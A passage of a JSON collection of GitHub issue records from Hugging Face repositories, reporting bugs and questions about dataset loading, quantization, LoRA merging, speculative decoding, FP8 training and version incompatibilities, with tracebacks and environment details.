The implementation details for FDG are available on page 19 of the paper.\n\nhttps://huggingface.co/papers/2506.19713", "url": "https://github.com/huggingface/diffusers/issues/11956", "state": "closed", "labels": [ "help wanted", "Good second issue", "contributions-welcome", "advanced", "consider-for-modular-diffusers" ], "created_at": "2025-07-18T19:12:50Z", "updated_at": "2025-08-07T05:51:03Z", "comments": 5, "user": "Msadat97" }, { "repo": "huggingface/datasets", "number": 7689, "title": "BadRequestError for loading dataset?", "body": "### Describe the bug\n\nUp until a couple days ago I was having no issues loading `Helsinki-NLP/europarl` and `Helsinki-NLP/un_pc`, but now suddenly I get the following error:\n\n```\nhuggingface_hub.errors.BadRequestError: (Request ID: ...)\n\nBad request:\n* Invalid input: expected array, received string * at paths * Invalid input: expected boolean, received string * at expand\n\u2716 Invalid input: expected array, received string\n \u2192 at paths\n\u2716 Invalid input: expected boolean, received string\n \u2192 at expand\n```\n\nI tried with both `4.0.0` and `3.5.1` since this dataset uses `trust_remote_code`, but I get the same error with both.\n\nWhat can I do to load the dataset? I checked the documentation and GitHub issues here, but couldn't find a solution.\n\n### Steps to reproduce the bug\n\n```python\nimport datasets\nds = datasets.load_dataset(\"Helsinki-NLP/europarl\", \"en-fr\", streaming=True, trust_remote_code=True)[\"train\"]\n```\n\n### Expected behavior\n\nThat the dataset loads as it did a couple days ago.\n\n### Environment info\n\n- `datasets` version: 3.5.1\n- Platform: Linux-4.18.0-513.24.1.el8_9.x86_64-x86_64-with-glibc2.28\n- Python version: 3.11.11\n- `huggingface_hub` version: 0.30.2\n- PyArrow version: 20.0.0\n- Pandas version: 2.2.2\n- `fsspec` version: 2024.6.1", "url": "https://github.com/huggingface/datasets/issues/7689", "state": "closed", "labels": [], "created_at": "2025-07-18T09:30:04Z", "updated_at": "2025-07-18T11:59:51Z", "comments": 17, "user": "WPoelman" }, { "repo": "huggingface/diffusers", "number": 11951, "title": "Kontext model loading quantization problem", "body": "Hello, can kontext be loaded quantitatively at present? Because I only have a 4090 with 24g video memory, the current fp16 loading method will cause OOM. Like flux, can it be loaded with torchao or gguf, so that this model can run on 4090?", "url": "https://github.com/huggingface/diffusers/issues/11951", "state": "closed", "labels": [], "created_at": "2025-07-18T03:20:48Z", "updated_at": "2025-07-18T05:39:28Z", "comments": 2, "user": "babyta" }, { "repo": "huggingface/transformers", "number": 39484, "title": "Transformers still tries to use apex.amp which is no longer a thing in apex.", "body": "### System Info\n\n\n```\nroot@12bb27e08b1b:/# pip show transformers\nName: transformers\nVersion: 4.52.3\n```\n\n\ntrainer.py contains this:\n```\nif is_apex_available():\n from apex import amp\n```\n\nApex (built from source, as they recommend) does no longer come with amp.\n\nHow to reproduce?\n1. install transformers\n2. install apex\n3. python `from trl import SFTTrainer`\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nHow to reproduce?\n1. install transformers\n2. install apex\n3. 
python `from trl import SFTTrainer`\n\n### Expected behavior\n\n\nThere should not be `from apex import amp` in the code base", "url": "https://github.com/huggingface/transformers/issues/39484", "state": "closed", "labels": [ "bug" ], "created_at": "2025-07-17T16:43:14Z", "updated_at": "2025-08-25T08:03:03Z", "comments": 4, "user": "yselivonchyk" }, { "repo": "huggingface/datasets", "number": 7688, "title": "No module named \"distributed\"", "body": "### Describe the bug\n\nhello, when I run the command \"from datasets.distributed import split_dataset_by_node\", I always met the bug \"No module named 'datasets.distributed\" in different version like 4.0.0, 2.21.0 and so on. How can I solve this?\n\n### Steps to reproduce the bug\n\n1. pip install datasets\n2. from datasets.distributed import split_dataset_by_node\n\n### Expected behavior\n\nexpecting the command \"from datasets.distributed import split_dataset_by_node\" can be ran successfully\n\n### Environment info\n\npython: 3.12", "url": "https://github.com/huggingface/datasets/issues/7688", "state": "open", "labels": [], "created_at": "2025-07-17T09:32:35Z", "updated_at": "2025-07-25T15:14:19Z", "comments": 3, "user": "yingtongxiong" }, { "repo": "huggingface/alignment-handbook", "number": 220, "title": "A little question: why num examples is much less than the total amount of my training dataset?", "body": "I am using this repo to SFT a model, and I notice that:\n\nI print the total amount of my training dataset, which is 7473\n\n`Number of raw training samples: 7473`\n\nBut during training, I find the log:\n\n[INFO|trainer.py:2314] 2025-07-17 17:03:23,908 >> ***** Running training *****\n[INFO|trainer.py:2315] 2025-07-17 17:03:23,908 >> Num examples = 698\n[INFO|trainer.py:2316] 2025-07-17 17:03:23,908 >> Num Epochs = 3\n[INFO|trainer.py:2317] 2025-07-17 17:03:23,908 >> Instantaneous batch size per device = 2\n[INFO|trainer.py:2320] 2025-07-17 17:03:23,908 >> Total train batch size (w. parallel, distributed & accumulation) = 32\n[INFO|trainer.py:2321] 2025-07-17 17:03:23,908 >> Gradient Accumulation steps = 4\n[INFO|trainer.py:2322] 2025-07-17 17:03:23,908 >> Total optimization steps = 66\n[INFO|trainer.py:2323] 2025-07-17 17:03:23,910 >> Number of trainable parameters = 7,612,756,480\n\nI am using a machine with 8 A100. Could anyone explain it? 
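\n\nFor what it's worth, one hypothesis: if the recipe keeps the handbook's usual `packing=True` with `max_seq_length=2048` (an assumption; worth checking the config), the tokenized samples get concatenated and sliced into fixed-length blocks, so \"Num examples\" counts packed blocks rather than raw samples, and the whole dataset is still consumed:\n\n```python\n# Back-of-the-envelope check under that assumption:\npacked_examples, max_seq_length, raw_samples = 698, 2048, 7473\navg_tokens = packed_examples * max_seq_length / raw_samples\nprint(f\"{avg_tokens:.0f} tokens per raw sample\")  # ~191, a plausible average length\n```\n\n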
I am afraid I didn't use the whole dataset but only 698 of 7473 samples to train...", "url": "https://github.com/huggingface/alignment-handbook/issues/220", "state": "closed", "labels": [], "created_at": "2025-07-17T09:12:08Z", "updated_at": "2025-07-23T23:30:33Z", "comments": 3, "user": "Red-Scarff" }, { "repo": "huggingface/diffusers", "number": 11945, "title": "Floating point exception with nightly PyTorch and CUDA", "body": "### Describe the bug\n\nWhen running any code snippet using diffusers it fails with floating point exception, and doesn't print any traceback.\n\nFor example this one would cause the issue (the example of Stable Diffusion 3.5 medium):\n\n```\nimport torch\nfrom diffusers import StableDiffusion3Pipeline\n\npipe = StableDiffusion3Pipeline.from_pretrained(\"stabilityai/stable-diffusion-3.5-medium\", torch_dtype=torch.bfloat16)\npipe = pipe.to(\"cuda\")\n\nimage = pipe(\n \"A capybara holding a sign that reads Hello World\",\n num_inference_steps=40,\n guidance_scale=4.5,\n).images[0]\nimage.save(\"capybara.png\")\n```\n\n\nThe issue could be with upstream PyTorch or CUDA, but we'd need to identify what of Diffusers is causing it.\n\n### Reproduction\n\nNot too sure as it's my first time with Diffusers but as suggested by [John6666](https://discuss.huggingface.co/u/John6666/summary) any NVIDIA GeForce RTX 5000 series... In my case it's a 16gb 5060 Ti. Perhaps CUDA 575.57.08 with CUDA version 12.9 and/or PyTorch 2.9.0.dev20250716+cu129?\n\n### Logs\n\n```shell\nLet me know how can I retrieve any logs you might need.\n```\n\n### System Info\n\n`diffusers-cli env` also causes a Floating point exception, but here you have environment information:\n\n**OS**: Debian 12\n\n```\nnvidia-smi\nWed Jul 16 15:58:48 2025 \n+-----------------------------------------------------------------------------------------+\n| NVIDIA-SMI 575.57.08 Driver Version: 575.57.08 CUDA Version: 12.9 |\n|-----------------------------------------+------------------------+----------------------+\n| GPU Name Persistence-M | Bus-Id Disp.A | Volatile Uncorr. ECC |\n| Fan Temp Perf Pwr:Usage/Cap | Memory-Usage | GPU-Util Compute M. |\n| | | MIG M. 
|\n|=========================================+========================+======================|\n| 0 NVIDIA GeForce RTX 5060 Ti On | 00000000:01:00.0 On | N/A |\n| 0% 42C P5 4W / 180W | 10MiB / 16311MiB | 0% Default |\n| | | N/A |\n+-----------------------------------------+------------------------+----------------------+\n \n+-----------------------------------------------------------------------------------------+\n| Processes: |\n| GPU GI CI PID Type Process name GPU Memory |\n| ID ID Usage |\n|=========================================================================================|\n| No running processes found |\n+-----------------------------------------------------------------------------------------+\n```\n\n```\npip list\nPackage Version\n------------------------ ------------------------\nbitsandbytes 0.46.1\ncertifi 2025.7.14\ncharset-normalizer 3.4.2\ndiffusers 0.34.0\nfilelock 3.18.0\nfsspec 2025.7.0\nhf-xet 1.1.5\nhuggingface-hub 0.33.4\nidna 3.10\nimportlib_metadata 8.7.0\nJinja2 3.1.6\nMarkupSafe 3.0.2\nmpmath 1.3.0\nnetworkx 3.5\nnumpy 2.3.1\nnvidia-cublas-cu12 12.9.1.4\nnvidia-cuda-cupti-cu12 12.9.79\nnvidia-cuda-nvrtc-cu12 12.9.86\nnvidia-cuda-runtime-cu12 12.9.79\nnvidia-cudnn-cu12 9.10.2.21\nnvidia-cufft-cu12 11.4.1.4\nnvidia-cufile-cu12 1.14.1.1\nnvidia-curand-cu12 10.3.10.19\nnvidia-cusolver-cu12 11.7.5.82\nnvidia-cusparse-cu12 12.5.10.65\nnvidia-cusparselt-cu12 0.7.1\nnvidia-nccl-cu12 2.27.5\nnvidia-nvjitlink-cu12 12.9.86\nnvidia-nvshmem-cu12 3.3.9\nnvidia-nvtx-cu12 12.9.79\npackaging 25.0\npillow 11.2.1\npip 23.0.1\npytorch-triton 3.4.0+gitae848267\nPyYAML 6.0.2\nregex 2024.11.6\nrequests 2.32.4\nsafetensors 0.5.3\nsetuptools 66.1.1\nsympy 1.14.0\ntorch 2.9.0.dev20250716+cu129\ntorchaudio 2.8.0.dev20250716+cu129\ntorchvision 0.24.0.dev20250716+cu129\ntqdm 4.67.1\ntriton 3.3.1\ntyping_extensions 4.14.1\nurllib3 2.5.0\nzipp 3.23.0\n```\n\nDon't hesitate to tell me any other info you might need.\n\n### Who can help?\n\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/11945", "state": "open", "labels": [ "bug" ], "created_at": "2025-07-17T03:16:02Z", "updated_at": "2025-08-02T13:48:05Z", "comments": 1, "user": "MxtAppz" }, { "repo": "huggingface/course", "number": 1009, "title": "How Transformers solve tasks - ASR section refers to task using Whisper but task actually uses Wav2Vec2", "body": "The [Automatic speech recognition](https://huggingface.co/learn/llm-course/chapter1/5?fw=pt#automatic-speech-recognition) segment of Section 1 \"Transformer Models\" > \"How \ud83e\udd17 Transformers solve tasks\" refers to \n\n> Check out our complete [automatic speech recognition guide](https://huggingface.co/docs/transformers/tasks/asr) to learn how to finetune Whisper and use it for inference!\n\nHowever the guide actually uses Wav2Vec2, not Whisper.\n\nThis is a dual request:\n\n1. Update the segment in question to refer to Wav2Vec2\n2. Update the task to use Whisper", "url": "https://github.com/huggingface/course/issues/1009", "state": "open", "labels": [], "created_at": "2025-07-16T23:25:55Z", "updated_at": "2025-07-16T23:25:55Z", "user": "renet10" }, { "repo": "huggingface/diffusers", "number": 11930, "title": "how to run convert_cosmos_to_diffusers.py correctly?", "body": "### Describe the bug\n\nhi. 
I have tried to convert the cosmos-transfer1's base model to diffusers using the \"convert_cosmos_to_diffusers.py\" script with options --transformer_type Cosmos-1.0-Diffusion-7B-Video2World --vae_type CV8x8x8-1.0 --transformer_ckpt_path ../fsdp_edge_v1/iter_000016000_ema_model_only.pt --output_path ./convert_to_diffusers\nbut I got this error:\n```Traceback (most recent call last):\n File \"/home1/jovyan/workspace/cosmos-transfer1/diffusers/../convert_cosmos_to_diffusers.py\", line 485, in \n transformer = convert_transformer(args.transformer_type, args.transformer_ckpt_path, weights_only)\n File \"/home1/jovyan/workspace/cosmos-transfer1/diffusers/../convert_cosmos_to_diffusers.py\", line 358, in convert_transformer\n transformer.load_state_dict(original_state_dict, strict=True, assign=True)\n File \"/opt/conda/envs/cosmos-transfer1/lib/python3.10/site-packages/torch/nn/modules/module.py\", line 2581, in load_state_dict\n raise RuntimeError(\nRuntimeError: Error(s) in loading state_dict for CosmosTransformer3DModel:\n Missing key(s) in state_dict: \"transformer_blocks.3.norm1.linear_1.weight\", \"transformer_blocks.3.norm1.linear_2.weight\", \"transformer_blocks.3.attn1.norm_q.weight\", \"transformer_blocks.3.attn1.norm_k.weight\", \"transformer_blocks.3.attn1.to_q.weight\", \"transformer_blocks.3.attn1.to_k.weight\", \"transformer_blocks.3.attn1.to_v.weight\", \"transformer_blocks.3.attn1.to_out.0.weight\", \"transformer_blocks.3.norm2.linear_1.weight\", \"transformer_blocks.3.norm2.linear_2.weight\", \"transformer_blocks.3.attn2.norm_q.weight\", \"transformer_blocks.3.attn2.norm_k.weight\", \"transformer_blocks.3.attn2.to_q.weight\", \"transformer_blocks.3.attn2.to_k.weight\", \"transformer_blocks.3.attn2.to_v.weight\", \"transformer_blocks.3.attn2.to_out.0.weight\", \"transformer_blocks.3.norm3.linear_1.weight\", \"transformer_blocks.3.norm3.linear_2.weight\", \"transformer_blocks.3.ff.net.0.proj.weight\", \"transformer_blocks.3.ff.net.2.weight\", \"transformer_blocks.4.norm1.linear_1.weight\", \"transformer_blocks.4.norm1.linear_2.weight\", \"transformer_blocks.4.attn1.norm_q.weight\", \"transformer_blocks.4.attn1.norm_k.weight\", \"transformer_blocks.4.attn1.to_q.weight\", \"transformer_blocks.4.attn1.to_k.weight\", \"transformer_blocks.4.attn1.to_v.weight\", \"transformer_blocks.4.attn1.to_out.0.weight\", \"transformer_blocks.4.norm2.linear_1.weight\", \"transformer_blocks.4.norm2.linear_2.weight\", \"transformer_blocks.4.attn2.norm_q.weight\", \"transformer_blocks.4.attn2.norm_k.weight\", \"transformer_blocks.4.attn2.to_q.weight\", \"transformer_blocks.4.attn2.to_k.weight\", \"transformer_blocks.4.attn2.to_v.weight\", \"transformer_blocks.4.attn2.to_out.0.weight\", \"transformer_blocks.4.norm3.linear_1.weight\", \"transformer_blocks.4.norm3.linear_2.weight\", \"transformer_blocks.4.ff.net.0.proj.weight\", \"transformer_blocks.4.ff.net.2.weight\", \"transformer_blocks.5.norm1.linear_1.weight\", \"transformer_blocks.5.norm1.linear_2.weight\", \"transformer_blocks.5.attn1.norm_q.weight\", \"transformer_blocks.5.attn1.norm_k.weight\", \"transformer_blocks.5.attn1.to_q.weight\", \"transformer_blocks.5.attn1.to_k.weight\", \"transformer_blocks.5.attn1.to_v.weight\", \"transformer_blocks.5.attn1.to_out.0.weight\", \"transformer_blocks.5.norm2.linear_1.weight\", \"transformer_blocks.5.norm2.linear_2.weight\", \"transformer_blocks.5.attn2.norm_q.weight\", \"transformer_blocks.5.attn2.norm_k.weight\", \"transformer_blocks.5.attn2.to_q.weight\", \"transformer_blocks.5.attn2.to_k.weight\", \"transformer_blocks.5.attn2.to_v.weight\", \"transformer_blocks.5.attn2.to_out.0.weight\", \"transformer_blocks.5.norm3.linear_1.weight\", \"transformer_blocks.5.norm3.linear_2.weight\", \"transformer_blocks.5.ff.net.0.proj.weight\", \"transformer_blocks.5.ff.net.2.weight\", \"transformer_blocks.6.norm1.linear_1.weight\", \"transformer_blocks.6.norm1.linear_2.weight\", \"transformer_blocks.6.attn1.norm_q.weight\", \"transformer_blocks.6.attn1.norm_k.weight\", \"transformer_blocks.6.attn1.to_q.weight\", \"transformer_blocks.6.attn1.to_k.weight\", \"transformer_blocks.6.attn1.to_v.weight\", \"transformer_blocks.6.attn1.to_out.0.weight\", \"transformer_blocks.6.norm2.linear_1.weight\", \"transformer_blocks.6.norm2.linear_2.weight\", \"transformer_blocks.6.attn2.norm_q.weight\", \"transformer_blocks.6.attn2.norm_k.weight\", \"transformer_blocks.6.attn2.to_q.weight\", \"transformer_blocks.6.attn2.to_k.weight\", \"transformer_blocks.6.attn2.to_v.weight\", \"transformer_blocks.6.attn2.to_out.0.weight\", \"transformer_blocks.6.norm3.linear_1.weight\", \"transformer_blocks.6.norm3.linear_2.weight\", \"transformer_blocks.6.ff.net.0.proj.weight\", \"transformer_blocks.6.ff.net.2.weight\", \"transformer_blocks.7.norm1.linear_1.weight\", \"transformer_blocks.7.norm1.linear_2.weight\", \"transformer_blocks.7.attn1.norm_q.weight\", \"transformer_blocks.7.attn1.norm_k.weight\", \"transformer_blocks.7.attn1.to_q.weight\", \"transformer_blocks.7.attn1.to_k.weight\", \"transformer_blocks.7.attn1.to_v.weight\", \"transformer_blocks.7.attn1.to_out.0.weight\", \"transformer_blocks.7.norm2.linear", "url": "https://github.com/huggingface/diffusers/issues/11930", "state": "open", "labels": [ "bug" ], "created_at": "2025-07-15T16:20:09Z", "updated_at": "2025-07-15T16:24:47Z", "user": "dedoogong" }, { "repo": "huggingface/transformers", "number": 39426, "title": "object detection: matching outputs.last_hidden_state with results", "body": "### Feature request\n\nIt seems to me that this would be possible with a little modification in the function post_process_object_detection:\n\nwith\n```\nfor score, label, box, index in zip(scores, labels, boxes, indexes):\n results.append(\n {\n \"scores\": score[score > threshold],\n \"labels\": label[score > threshold],\n \"boxes\": box[score > threshold],\n \"indexes\": index[score > threshold],\n }\n )\n```\nand then\n`outputs.last_hidden_state[0][results[0]['indexes']]`\ngives me the desired vector features.\n\nAm I right, or is there a better way to obtain this matching?\n\nThanks for your help\n\n### Motivation\n\nI would like to use outputs.last_hidden_state as features for auxiliary tasks. So I need to know the label and the bounding box associated with a given vector of outputs.last_hidden_state\n\n### Your contribution\n\nI am not a top coder and do not know how to submit a PR", "url": "https://github.com/huggingface/transformers/issues/39426", "state": "open", "labels": [ "Feature request" ], "created_at": "2025-07-15T13:34:08Z", "updated_at": "2025-07-22T11:08:23Z", "comments": 5, "user": "fenaux" }, { "repo": "huggingface/peft", "number": 2647, "title": "How can I merge the original model weights with LoRA weights?", "body": "I'm currently fine-tuning Qwen2.5_VL. Specifically, I used PEFT for LoRA fine-tuning on the linear layers of the LLM part. Meanwhile, I performed regular fine-tuning on other components like visual.merger and embed_tokens (with param.requires_grad set to True). 
After generating the files, as follow:\n\n\"Image\"\nI exported pytorch_model.bin using zero_to_fp32.py. When I printed the weight keys of the pytorch_model.bin file, I noticed that the original weights and LoRA weights weren't merged. Here's an example:\n\n```\nbase_model.model.model.language_model.layers.0.self_attn.q_proj.base_layer.weight: shape=(2048, 2048), dtype=torch.bfloat16\nbase_model.model.model.language_model.layers.0.self_attn.q_proj.base_layer.bias: shape=(2048,), dtype=torch.bfloat16\nbase_model.model.model.language_model.layers.0.self_attn.q_proj.lora_A.default.weight: shape=(8, 2048), dtype=torch.bfloat16\nbase_model.model.model.language_model.layers.0.self_attn.q_proj.lora_B.default.weight: shape=(2048, 8), dtype=torch.bfloat16\n```\n\nCould you tell me how to merge them? If I use\n`model = model.merge_and_unload()`\nI need the base_model. However, I no longer have the original base_model, and the original Qwen_2.5_VL model isn't suitable because apart from LoRA fine-tuning the linear layers, I also fine-tuned visual.merger and embed_tokens.\n\nHow can I solve this problem? Thank you!\n", "url": "https://github.com/huggingface/peft/issues/2647", "state": "closed", "labels": [], "created_at": "2025-07-15T11:40:33Z", "updated_at": "2025-08-23T15:03:44Z", "comments": 4, "user": "guoguo1314" }, { "repo": "huggingface/transformers", "number": 39421, "title": "Speculative Decoding(do_sample=False) get different outputs", "body": "> @transcend-0 hey!\n> \n> \n> \n> The issue was solved in [#30068](https://github.com/huggingface/transformers/pull/30068). You can install transformers from `main` with the following line for the correct generation with assisted decoding:\n> \n> \n> \n> `!pip install --upgrade git+https://github.com/huggingface/transformers.git` \n\n _Originally posted by @zucchini-nlp in [#30608](https://github.com/huggingface/transformers/issues/30608#issuecomment-2089846816)_\n\n### **System Info**\n\nPython 3.10.11\ntransformers 4.49.0\ntorch 2.6.0+cu124\n\n### **Same Reproduction**\nTarget_Model = Qwen2.5-32B-Instruct\nDraft_Model = Qwen2.5-7B-Instruct\n\n\n`question = \"Dienes are organic compounds with two adjacent double bonds in their structure, and they exhibit unique reactivity due to their conjugated pi-electron system. They play a significant role in organic chemistry and are involved in various chemical reactions and natural processes.\\nAmong the given options which one is the possible reactant (A) for the given reaction also mention the correct sequence of the dienes according to their reactivity ( most reactive to least reactive) B.\\nCyclohexene + A ---> 8,8-diiodobicyclo[4.2.0]octan-7-one\\n(B) 1. 2,3-dimethylbuta-1,3-diene, 2. (2E,4E)-hexa-2,4-diene, 3. (2E,4E)-hexa-2,4-diene, 4. (2Z,4Z)-hexa-2,4-diene\\n\\n\\nA. A = 2,2-diiodoethen-1-one, B = 3, 1, 2, 4\\nB. A = 2,2-diiodoethen-1-one, B = 4, 2, 1, 3\\nC. A = 4,4-diiodocyclobut-2-en-1-one, B = 3, 1, 2, 4\\nD. A = 4,4-diiodocyclobut-2-en-1-one, B = 4, 2, 1, 3\\n\\n\"`\n`prompt = '<|im_start|>user' + question + 'Please reason step-by-step and put your choice letter without any other text with \\\\boxed{} in the end.'`\n\n`['userDienes are organic compounds with two adjacent double bonds in their structure, and they exhibit unique reactivity due to their conjugated pi-electron system. 
They play a significant role in organic chemistry and are involved in various chemical reactions and natural processes.\\nAmong the given options which one is the possible reactant (A) for the given reaction also mention the correct sequence of the dienes according to their reactivity ( most reactive to least reactive) B.\\nCyclohexene + A ---> 8,8-diiodobicyclo[4.2.0]octan-7-one\\n(B) 1. 2,3-dimethylbuta-1,3-diene, 2. (2E,4E)-hexa-2,4-diene, 3. (2E,4E)-hexa-2,4-diene, 4. (2Z,4Z)-hexa-2,4-diene\\n\\n\\nA. A = 2,2-diiodoethen-1-one, B = 3, 1, 2, 4\\nB. A = 2,2-diiodoethen-1-one, B = 4, 2, 1, 3\\nC. A = 4,4-diiodocyclobut-2-en-1-one, B = 3, 1, 2, 4\\nD. A = 4,4-diiodocyclobut-2-en-1-one, B = 4, 2, 1, 3\\n\\nPlease reason step-by-step and put your choice letter without any other text with \\\\boxed{} in the end. To solve this problem, we need to identify the reactant \\\\( A \\\\) that can react with cyclohexene to form 8,8-diiodobicyclo[4.2.0]octan-7-one. We also need to determine the correct sequence of the dienes according to their reactivity from most reactive to least reactive.\\n\\n### Step-by-Step Reasoning:\\n\\n1. **Identify the Product:**\\n - The product is 8,8-diiodobicyclo[4.2.0]octan-7-one. This suggests that the reactant \\\\( A \\\\) must be a compound that can undergo a Diels-Alder reaction with cyclohexene to form the bicyclic structure and then iodination at the appropriate positions.\\n\\n2. **Reactant Identification:**\\n - The reactant \\\\( A \\\\) should be a dienophile (a compound with a double bond that can participate in a Diels-Alder reaction). Among the given options, the possible candidates are:\\n - 2,2-diiodoethen-1-one\\n - 4,4-diiodocyclobut-2-en-1-one\\n\\n3. **Diels-Alder Reaction:**\\n - Cyclohexene is a diene, and it will react with a dienophile to form a bicyclic structure. The dienophile should have a double bond that can react with the diene to form the desired product.\\n - 2,2-diiodoethen-1-one has a double bond and iodine substituents, making it a suitable dienophile.\\n - 4,4-diiodocyclobut-2-en-1-one also has a double bond but is more complex and less likely to form the desired product directly.\\n\\n4. **Sequence of Dienes According to Reactivity:**\\n - The reactivity of dienes depends on the stability of the conjugated pi-electron system.\\n - Generally, the order of reactivity from most reactive to least reactive is:\\n 1. (2E,4E)-hexa-2,4-diene (most stable and reactive)\\n 2. (2E,4E)-hexa-2,4-diene (same as above)\\n 3. 2,3-dimethylbuta-1,3-diene (less stable due to steric hindrance)\\n 4. (2Z,4Z)-hexa-2,4-diene (least stable due to cis configuration)\\n\\n5. 
**Matching Options:**\\n - Option A: \\\\( A = 2,2 \\\\)-diiodoethen-1-one, B = 3, 1, 2, 4\\n - Option B: \\\\( A = 2,2 \\\\)-diiodoethen-1-one, B = 4, 2, 1, 3\\n - Option C: \\\\( A = 4,4 \\\\)-diiodocyclobut-2-en-1-one, B = 3, 1, 2, 4\\n - Option D: \\\\( A = 4,4 \\\\)-diiodocyclobut-2-en-1-one, B = 4, 2, 1, 3\\n\\nGiven the correct sequence of dienes and the suitable dienophile, the correct option is:\\n\\n\\\\boxed{A}']`\n- targetDecoding - Running time: 41.82 s`\n\n`['userDienes are organic compounds with two adjacent double bonds in thei", "url": "https://github.com/huggingface/transformers/issues/39421", "state": "closed", "labels": [], "created_at": "2025-07-15T11:36:31Z", "updated_at": "2025-07-19T03:11:04Z", "comments": 13, "user": "nighty8" }, { "repo": "huggingface/lerobot", "number": 1508, "title": "so101_dualarm_triplecam config to evaluate ACT policy?", "body": "I recently fine-tuned an ACT policy where my data was from 3 cameras (1 overhead + 2 wrist) and two so101's. Then I tried to evaluate it but noticed there is currently a config file missing to support this. Does this support exist, or will it soon?", "url": "https://github.com/huggingface/lerobot/issues/1508", "state": "open", "labels": [ "question", "robots" ], "created_at": "2025-07-15T03:44:32Z", "updated_at": "2025-08-12T09:30:41Z", "user": "sebastiandavidlee" }, { "repo": "huggingface/transformers", "number": 39410, "title": "FP8 training support for Model Parallel / Tensor Parallel (MP/TP)", "body": "### Feature request\n\nI receive the message \"ValueError: The model you are trying to fine-tune is quantized with QuantizationMethod.FP8 but that quantization method do not support training. Please open an issue on GitHub: https://github.com/huggingface/transformers to request the support for training support for QuantizationMethod.FP8\" when trying to fine-tune an FP8 model.\nI have learned from the documentation that FP8 models can be trained with DDP, ZeRO, or FSDP. 
Is there a way to do it with MP/TP for huge fp8 models?\n\n### Motivation\n\nEnable finetuning huge fp8 models, like Qwen/Qwen3-235B-A22B-FP8\n\n### Your contribution\n\nI'm afraid it's too tough for me, but I'll do whatever I can if you need.", "url": "https://github.com/huggingface/transformers/issues/39410", "state": "open", "labels": [ "Feature request" ], "created_at": "2025-07-15T02:13:05Z", "updated_at": "2025-07-15T13:30:27Z", "comments": 2, "user": "edgeinfinity1" }, { "repo": "huggingface/transformers", "number": 39409, "title": "TypeError: couldn't find storage object Float8_e4m3fnStorage - which version is needed for this?", "body": "Tested so many versions but can't find a version that won't give this error\n\n\n```\n!pip install bitsandbytes==0.45.0 --upgrade\n!pip install insightface --upgrade\n!pip install huggingface_hub==0.25.1 hf_transfer diffusers==0.31.0 transformers==4.36.0\n!pip uninstall xformers triton --yes\n!pip install torch==2.2.0+cu121 torchvision --index-url https://download.pytorch.org/whl/cu121\n!pip install xformers==0.0.24 --index-url https://download.pytorch.org/whl/cu121\n```\n\n```\n\n File \"/kaggle/temp/InstantID/gradio_demo/web-ui-multicontrolnet.py\", line 975, in generate_image\n reload_pipe(model_input, model_dropdown, scheduler, adapter_strength_ratio, enable_LCM, depth_type, lora_model_dropdown, lora_scale,test_all_loras,single_lora)\n File \"/kaggle/temp/InstantID/gradio_demo/web-ui-multicontrolnet.py\", line 654, in reload_pipe\n pipe = load_model(_pretrained_model_folder, model_to_load)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/kaggle/temp/InstantID/gradio_demo/web-ui-multicontrolnet.py\", line 528, in load_model\n pipeline = StableDiffusionPipeline.from_pretrained(\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/usr/local/lib/python3.11/dist-packages/huggingface_hub/utils/_validators.py\", line 114, in _inner_fn\n return fn(*args, **kwargs)\n ^^^^^^^^^^^^^^^^^^^\n File \"/usr/local/lib/python3.11/dist-packages/diffusers/pipelines/pipeline_utils.py\", line 896, in from_pretrained\n loaded_sub_model = load_sub_model(\n ^^^^^^^^^^^^^^^\n File \"/usr/local/lib/python3.11/dist-packages/diffusers/pipelines/pipeline_loading_utils.py\", line 704, in load_sub_model\n loaded_sub_model = load_method(os.path.join(cached_folder, name), **loading_kwargs)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/usr/local/lib/python3.11/dist-packages/transformers/modeling_utils.py\", line 4027, in from_pretrained\n dtype_orig = cls._set_default_torch_dtype(torch_dtype)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/usr/local/lib/python3.11/dist-packages/transformers/modeling_utils.py\", line 1584, in _set_default_torch_dtype\n torch.set_default_dtype(dtype)\n File \"/usr/local/lib/python3.11/dist-packages/torch/__init__.py\", line 1009, in set_default_dtype\n _C._set_default_dtype(d)\nTypeError: couldn't find storage object Float8_e4m3fnStorage\n```\n\n", "url": "https://github.com/huggingface/transformers/issues/39409", "state": "closed", "labels": [ "bug" ], "created_at": "2025-07-15T01:51:08Z", "updated_at": "2025-08-02T12:06:59Z", "comments": 1, "user": "FurkanGozukara" }, { "repo": "huggingface/datasets", "number": 7682, "title": "Fail to cast Audio feature for numpy arrays in datasets 4.0.0", "body": "### Describe the bug\n\nCasting features with Audio for numpy arrays - done here with `ds.map(gen_sine, features=features)` fails\nin version 4.0.0 but not in version 3.6.0\n\n\n### Steps to 
reproduce the bug\n\nThe following `uv script` should be able to reproduce the bug in version 4.0.0\nand pass in version 3.6.0 on a macOS Sequoia 15.5\n\n```python\n# /// script\n# requires-python = \">=3.13\"\n# dependencies = [\n# \"datasets[audio]==4.0.0\",\n# \"librosa>=0.11.0\",\n# ]\n# ///\n# NAME\n# create_audio_dataset.py - create an audio dataset of sine waves\n#\n# SYNOPSIS\n# uv run create_audio_dataset.py\n#\n# DESCRIPTION\n# Create an audio dataset using the Hugging Face [datasets] library.\n# Illustrates how to create synthetic audio datasets using the [map]\n# datasets function.\n#\n# The strategy is to first create a dataset with the input to the\n# generation function, then execute the map function that generates\n# the result, and finally cast the final features.\n#\n# BUG\n# Casting features with Audio for numpy arrays -\n# done here with `ds.map(gen_sine, features=features)` fails\n# in version 4.0.0 but not in version 3.6.0\n#\n# This happens both in cases where --extra audio is provided and where is not.\n# When audio is not provided i've installed the latest compatible version\n# of soundfile.\n#\n# The error when soundfile is installed but the audio --extra is not\n# indicates that the array values do not have the `.T` property,\n# whilst also indicating that the value is a list instead of a numpy array.\n#\n# Last lines of error report when for datasets + soundfile case\n# ...\n#\n# File 